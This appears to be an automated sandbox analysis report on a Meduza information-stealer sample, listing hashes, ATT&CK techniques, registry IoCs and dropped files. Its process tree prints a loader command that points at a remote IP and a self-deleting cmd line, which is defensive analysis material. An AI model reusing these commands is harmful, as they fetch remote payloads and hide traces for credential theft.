meduza | 88b5797f60912b551a7b7e90c73e16adb4cecbb21e812857819d14b50b40e92a

Analysis

max time kernel
94s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
26-12-2024 11:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

88b5797f60912b551a7b7e90c73e16adb4cecbb21e812857819d14b50b40e92a.exe
Size

426KB
MD5

f099b576103e84aab845abb822c1c166
SHA1

cc0412d9b7402cf6f7e254755af3a6af2304ba5c
SHA256

88b5797f60912b551a7b7e90c73e16adb4cecbb21e812857819d14b50b40e92a
SHA512

2d5fab7e02b468f3ac7b4f86d3e74b566605ef3b9f1d9ebe8e1d6d392f83fb9984f1b8746be25205056e06667211643b6f25cfe3228a708a7522edde54aed255
SSDEEP

6144:uOXKL6VXwZoU3keNI/OQgRr4G9bx9Neb4rd5+aeyBLvLLLIgjjgLRvLvLLLYgjjU:dwZoU3k+7QI84MnoFgA

Score

10^/10

meduza collection discovery spyware stealer

Malware Config

Signatures

Meduza
Meduza is a crypto wallet and info stealer written in C++.
stealer meduza

Meduza Stealer payload 3 IoCs

resource	yara_rule
behavioral2/memory/60-196-0x0000000000400000-0x0000000000522000-memory.dmp	family_meduza
behavioral2/memory/60-199-0x0000000000400000-0x0000000000522000-memory.dmp	family_meduza
behavioral2/memory/60-197-0x0000000000400000-0x0000000000522000-memory.dmp	family_meduza

Meduza family
meduza

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	88b5797f60912b551a7b7e90c73e16adb4cecbb21e812857819d14b50b40e92a.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	RegAsm.exe

Executes dropped EXE 1 IoCs

pid	Process
4592	php-win.exe

Loads dropped DLL 11 IoCs

pid	Process
4592	php-win.exe
4592	php-win.exe
4592	php-win.exe
4592	php-win.exe
4592	php-win.exe
4592	php-win.exe
4592	php-win.exe
4592	php-win.exe
4592	php-win.exe
4592	php-win.exe
4592	php-win.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
44	api.ipify.org
45	api.ipify.org
41	ip-api.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4592 set thread context of 60	4592	php-win.exe	104

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	php-win.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2776	timeout.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
60	RegAsm.exe
60	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1224	88b5797f60912b551a7b7e90c73e16adb4cecbb21e812857819d14b50b40e92a.exe
Token: SeDebugPrivilege	60	RegAsm.exe
Token: SeImpersonatePrivilege	60	RegAsm.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 1224 wrote to memory of 4592	1224	88b5797f60912b551a7b7e90c73e16adb4cecbb21e812857819d14b50b40e92a.exe	99
PID 1224 wrote to memory of 4592	1224	88b5797f60912b551a7b7e90c73e16adb4cecbb21e812857819d14b50b40e92a.exe	99
PID 1224 wrote to memory of 4592	1224	88b5797f60912b551a7b7e90c73e16adb4cecbb21e812857819d14b50b40e92a.exe	99
PID 1224 wrote to memory of 1716	1224	88b5797f60912b551a7b7e90c73e16adb4cecbb21e812857819d14b50b40e92a.exe	100
PID 1224 wrote to memory of 1716	1224	88b5797f60912b551a7b7e90c73e16adb4cecbb21e812857819d14b50b40e92a.exe	100
PID 1716 wrote to memory of 2776	1716	cmd.exe	102
PID 1716 wrote to memory of 2776	1716	cmd.exe	102
PID 4592 wrote to memory of 60	4592	php-win.exe	104
PID 4592 wrote to memory of 60	4592	php-win.exe	104
PID 4592 wrote to memory of 60	4592	php-win.exe	104
PID 4592 wrote to memory of 60	4592	php-win.exe	104
PID 4592 wrote to memory of 60	4592	php-win.exe	104
PID 4592 wrote to memory of 60	4592	php-win.exe	104
PID 4592 wrote to memory of 60	4592	php-win.exe	104
PID 4592 wrote to memory of 60	4592	php-win.exe	104
PID 4592 wrote to memory of 60	4592	php-win.exe	104
PID 4592 wrote to memory of 60	4592	php-win.exe	104

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\88b5797f60912b551a7b7e90c73e16adb4cecbb21e812857819d14b50b40e92a.exe
"C:\Users\Admin\AppData\Local\Temp\88b5797f60912b551a7b7e90c73e16adb4cecbb21e812857819d14b50b40e92a.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1224
- C:\Users\Admin\AppData\Local\Temp\php-8.2.25-nts-Win32-vs16-x86\php-win.exe
  "C:\Users\Admin\AppData\Local\Temp\php-8.2.25-nts-Win32-vs16-x86\php-win.exe" -d include_path="C:\Users\Admin\AppData\Local\Temp\php-8.2.25-nts-Win32-vs16-x86" "C:\Users\Admin\AppData\Local\Temp\php-8.2.25-nts-Win32-vs16-x86\example" --l="http://62.197.48.140/v2/build/4/lib/examplep3msw"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4592
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Checks computer location settings
    - Accesses Microsoft Outlook profiles
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - outlook_office_path
    - outlook_win_path
    PID:60
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C timeout /T 3 /NOBREAK > nul & del /F /Q "C:\Users\Admin\AppData\Local\Temp\88b5797f60912b551a7b7e90c73e16adb4cecbb21e812857819d14b50b40e92a.exe" & if exist "C:\Users\Admin\AppData\Local\Temp\88b5797f60912b551a7b7e90c73e16adb4cecbb21e812857819d14b50b40e92a.exe" (timeout /T 2 /NOBREAK > nul & del /F /Q "C:\Users\Admin\AppData\Local\Temp\88b5797f60912b551a7b7e90c73e16adb4cecbb21e812857819d14b50b40e92a.exe" & if exist "C:\Users\Admin\AppData\Local\Temp\88b5797f60912b551a7b7e90c73e16adb4cecbb21e812857819d14b50b40e92a.exe" (exit 1) else (exit 0)) else (exit 0)
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1716
- - C:\Windows\system32\timeout.exe
    timeout /T 3 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:2776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\php-8.2.25-nts-Win32-vs16-x86\example

Filesize
661B

MD5
b9151437dc63bbb9c30f266a05f43d1d

SHA1
5f69cb0645310674086e5c034b3bfde4ba981d76

SHA256
850a577ac47759faabdda4bcf39876cfcfd2ec4ec549402e1cb22b3c2f47e4b3

SHA512
f9dba541dfa8270dbd232b813e5bd26bf99473d6252e90beda5ef5aa08feea05438c8104ce6f2ac041732dd4a5effe2ca55b2c69bf943e727879a9a1b5990e91

Download Submit
C:\Users\Admin\AppData\Local\Temp\php-8.2.25-nts-Win32-vs16-x86\ext\php_curl.dll

Filesize
579KB

MD5
7bad2c2d5616e53519b0c2dbf3752530

SHA1
c7bab019f828f08a3cbb6dee4133387c2f96415d

SHA256
64e12d8a91e1ad8c4503a9c53ae5576b018c14ab9233b1f29a1a6be462ffd623

SHA512
c01afe6946e223cf1a34e0e0d4d04dfcf292a4d728061a4560ee556e718313c7b30677ac9ebc9591a6849d0ca44c56f14d9d40e10d7feea51aea952e595d978d

Download Submit
C:\Users\Admin\AppData\Local\Temp\php-8.2.25-nts-Win32-vs16-x86\ext\php_ffi.dll

Filesize
140KB

MD5
aad728f90ec64d8dcad407ad509d09f0

SHA1
acfe5d94ad1a1947f8339ab53f0361a51d897a5e

SHA256
c4d4b409f735293d1baf4596df22457a501d09004fa9c6c7a4091b2508324aa9

SHA512
c9fa05654ce59428c226062f2495ba4881e951d4569d0b27855876308a7d822c730f56429284875a8a7bd666154643629730244cf5f5adc8d08f92c18f45dca9

Download Submit
C:\Users\Admin\AppData\Local\Temp\php-8.2.25-nts-Win32-vs16-x86\ext\php_openssl.dll

Filesize
125KB

MD5
ff48c8442c28e7e537f5137171db071d

SHA1
c17253ca6fe3257ca21bb1865f4c0f32d412c74a

SHA256
c854115493076c2acc1b7e3730527aac39a9b801f6b1bf7c7de2cc07b5f8f6e5

SHA512
de47d86a214fc7e905ea361a9c788df724c30d323a43f01cadf45e439e5c7abcbdb2df656cdddeb6a44c557dde84764ef4d3d7370bb36171e8e5063a9caf7866

Download Submit
C:\Users\Admin\AppData\Local\Temp\php-8.2.25-nts-Win32-vs16-x86\ext\php_sockets.dll

Filesize
60KB

MD5
2ea239a4321cf0742e532f28d85f8089

SHA1
11d1d2c88c41da5f54b904604a29556bee8cd052

SHA256
c9b5bcb4d8f2c904928c0d497b02a38bc8fcb8821533753452863f097ce782bb

SHA512
a913e9d35c04fe984db59e28814a4ce6307cbd83503b2badae055cf954fc12140ef37be4dd2d3ed716d34b5353a217712c3f8761b7d36589df695c1d1303f8af

Download Submit
C:\Users\Admin\AppData\Local\Temp\php-8.2.25-nts-Win32-vs16-x86\libcrypto-3.dll

Filesize
3.6MB

MD5
0096dbf08e9e9ffbd0d450d20a502b2a

SHA1
d6181135695df6b21c7859369961251550bd96e2

SHA256
5128ad87544961ec54cf633df1bbe2e6b63f91d27e91d567846c571ebabbcc48

SHA512
3b473cc7091a2f934896d356f16768405ce35dc5905d73db90ad2534d84ec62e034f0f697f4aa4e0f242f3f90de691803e544e3cd31a31e3bc22925770b5a2e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\php-8.2.25-nts-Win32-vs16-x86\libssh2.dll

Filesize
306KB

MD5
a611a7c00241555c98b584b9234c1563

SHA1
8b5195ee9883b1bcbd95b6afa44fe2a6f4c795b7

SHA256
83347d8c5566e7cde429f37c428088e4789aa494cb4eb7a5bedff50878cbd9ec

SHA512
390d520d129afc7805aba6a37a84adf7b5b1809f473bca509fba8e14d73eab3b4866f5988df050a2786314e1fc7f4de6b7f5a652ba0bf7d557d145b773368f88

Download Submit
C:\Users\Admin\AppData\Local\Temp\php-8.2.25-nts-Win32-vs16-x86\libssl-3.dll

Filesize
610KB

MD5
c190634b29d893bd0fd1493118c3e9a5

SHA1
ea9bfff74545d8bcc051fe65e02a13bd298b6f85

SHA256
a7332a7fac8290355915753aa7a0bdb03cac3b644b9d3b1377bba3e03d156a6a

SHA512
710f2ad83ffd50db8c21bdf2f9fef309327c12fd52074487f7da9aea7a98c57e36e4eb6cd1ccf9256dbb327a091c782a04b169d2ee195ec61db4faface995284

Download Submit
C:\Users\Admin\AppData\Local\Temp\php-8.2.25-nts-Win32-vs16-x86\nghttp2.dll

Filesize
185KB

MD5
4d5d00e20671e6c231e1dda416724048

SHA1
881643edcdb150e666fdaebd60c312451366d169

SHA256
a6bcc215119bb54cc704d9fd808909b40def456eb0beccf75655d9117a2e0bf7

SHA512
8a9c1a9b63bb038f3f0706cfaa90f4a1ec43c796b47b2173ab5c3c7a08a2018d1a37f7e2cc3080bab3985dc7090d8a005af694ff6575f53f4b20ba24444d52a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\php-8.2.25-nts-Win32-vs16-x86\php-win.exe

Filesize
33KB

MD5
d95286c63eef30414791e2962edb75e9

SHA1
666e03ea2cf74c7defdaec0e2d32145d75bed04d

SHA256
813ac3e286c147cf73168c092fc1ebdd5c1e093c36f3f0b9a1cca04046e5a986

SHA512
e4e8d031439cc4d3b9ef91a0a1aa36e18b6dd727d20eb53325bd7c38041283939b537029db4ef74d4296616a36010206212273bfa57717de970254f41f0c4584

Download Submit
C:\Users\Admin\AppData\Local\Temp\php-8.2.25-nts-Win32-vs16-x86\php.ini

Filesize
74KB

MD5
8fd4eb0ed79b0c875a75d6a92840c04f

SHA1
07b7cdef5a7de4ea7024807f5df5d84cf44c8b25

SHA256
de306650e39f1a95496b7c659c73f224d3f9de18695b0c1eaa774224f25ce8a6

SHA512
6ec0da5845fd9bfb7cb5585de01cdbaa38c19a7cf91285002c28231881f6dab2ea0f56c062fabca8d129b11de2ae9d8eb29d31889c3c1f3233cd44444e5721c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\php-8.2.25-nts-Win32-vs16-x86\php8.dll

Filesize
7.3MB

MD5
857166d11ee66dd0dd2cd5e65c2fd52f

SHA1
74c186320d13e7faca672958f2ae54e5bf32b4b9

SHA256
30359b8c1d9f0456bc27ebe16c66c3fdbdee2106a6be6f4c007366f2515b74bb

SHA512
5f2e32b0dc1f6ce158204d22680522768c337b8f9096e24c4117a5fe22943e9bbc6f4d0b7538ace1c952c9c9969ee3f2bb1fb29901a2cd0acbe3995c05bfd2fb

Download Submit
memory/60-196-0x0000000000400000-0x0000000000522000-memory.dmp

Filesize
1.1MB

Download
memory/60-197-0x0000000000400000-0x0000000000522000-memory.dmp

Filesize
1.1MB

Download
memory/60-199-0x0000000000400000-0x0000000000522000-memory.dmp

Filesize
1.1MB

Download
memory/1224-3-0x00007FF873D53000-0x00007FF873D55000-memory.dmp

Filesize
8KB

Download
memory/1224-4-0x0000022C49570000-0x0000022C49719000-memory.dmp

Filesize
1.7MB

Download
memory/1224-5-0x00007FF873D50000-0x00007FF874811000-memory.dmp

Filesize
10.8MB

Download
memory/1224-2-0x00007FF873D50000-0x00007FF874811000-memory.dmp

Filesize
10.8MB

Download
memory/1224-12-0x0000022C4A400000-0x0000022C4A40A000-memory.dmp

Filesize
40KB

Download
memory/1224-1-0x0000022C2EED0000-0x0000022C2EF3C000-memory.dmp

Filesize
432KB

Download
memory/1224-195-0x00007FF873D50000-0x00007FF874811000-memory.dmp

Filesize
10.8MB

Download
memory/1224-183-0x0000022C49570000-0x0000022C49719000-memory.dmp

Filesize
1.7MB

Download
memory/1224-11-0x0000022C4A410000-0x0000022C4A422000-memory.dmp

Filesize
72KB

Download
memory/1224-0-0x00007FF873D53000-0x00007FF873D55000-memory.dmp

Filesize
8KB

Download